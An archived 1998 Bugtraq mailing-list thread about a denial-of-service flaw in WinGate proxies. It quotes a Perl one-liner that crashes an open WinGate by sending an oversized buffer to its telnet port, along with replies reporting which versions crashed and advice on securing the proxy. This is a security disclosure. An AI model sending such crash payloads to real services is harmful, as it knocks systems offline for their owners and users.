Bugtraq mailing list archives

Re: crashing wingates

From: kotu () cyberspace org (Kotu Srinivasa Reddy)
Date: Tue, 17 Nov 1998 01:05:27 +0530


This is a multi-part message in MIME format.
--------------7C027181AD7A66528D2317BC
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Hi,
        I have tested the C program received through bugtraq and have tested it
on Wingate 2.1d and i had run the program more than once to crash it.
Wingate stopped responding but the OS was stable.

Noam Rathaus wrote:


Hi,

I have to report that WinGate 2.1 seems to be unaffected.

G23 wrote:


Hello,

The following one-liner will crash an open Wingate.

perl -MIO::Socket -e \
'IO::Socket::INET->new(PeerAddr=>"wingate.to.hoze:23")\
->send("X" x 4400 . "\n",0)'

Unfortunately I don't have access to one that I can test,
so I am unable to verify what versions are vulnerable.
The above is my rendition of a 44 line sh script written
by "rEWTED" (kefka () infected org).

Anyone configuring a proxy for LAN use should only bind to an internal
interface anyway.  (IE, kidz shouldn't even see your proxy)
http://wingate.net/helppages/wingate2Securing_your_network.html

If you do provide telnet proxy for the world, then at least log.
http://wingate.net/helppages/wingate2Auditing_and_Logging.html

ghost23

____________________________________________________________________
Get free e-mail and a permanent address at http://www.netaddress.com/?N=1


--
Thanks
Noam Rathaus
http://members.xoom.com/dolittle
for Exchange Server Q&A : http://members.xoom.com/dolittle
PGP Key Fingerprint:  8AC7 62AD 860A 4327 3122  544F 34B6 F3A8 2515 7D02

"and - Change your quote already!" - Al Avi

--------------7C027181AD7A66528D2317BC
Content-Type: text/x-vcard; charset=us-ascii;
 name="kotu.vcf"
Content-Transfer-Encoding: 7bit
Content-Description: Card for Kotu Srinivasa Reddy
Content-Disposition: attachment;
 filename="kotu.vcf"

begin:vcard
n:Srinivasa Reddy;Kotu
x-mozilla-html:FALSE
url:http://i.am/kotu
org:Indian Institute of Technology;Dept. of Mining Engg.
version:2.1
email;internet:kotu () cyberspace org
title:Student
adr;quoted-printable;quoted-printable:;;A Top, LLR Hall,=0D=0A=
        IIT,;Kharagpur;West Bengal;721302;INDIA
fn:Kotu Srinivasa Reddy
end:vcard


--------------7C027181AD7A66528D2317BC--

Current thread:

crashing wingates G23 (Nov 14)
- Re: crashing wingates Eric Wanner (Nov 14)
- Administrivia Aleph One (Nov 14)
  - Re: Administrivia Chris Tobkin (Nov 15)
  - SerialPOP DoS Philip Stoev (Nov 15)
- <Possible follow-ups>
- Re: crashing wingates Noam Rathaus (Nov 15)
- Re: crashing wingates Kotu Srinivasa Reddy (Nov 16)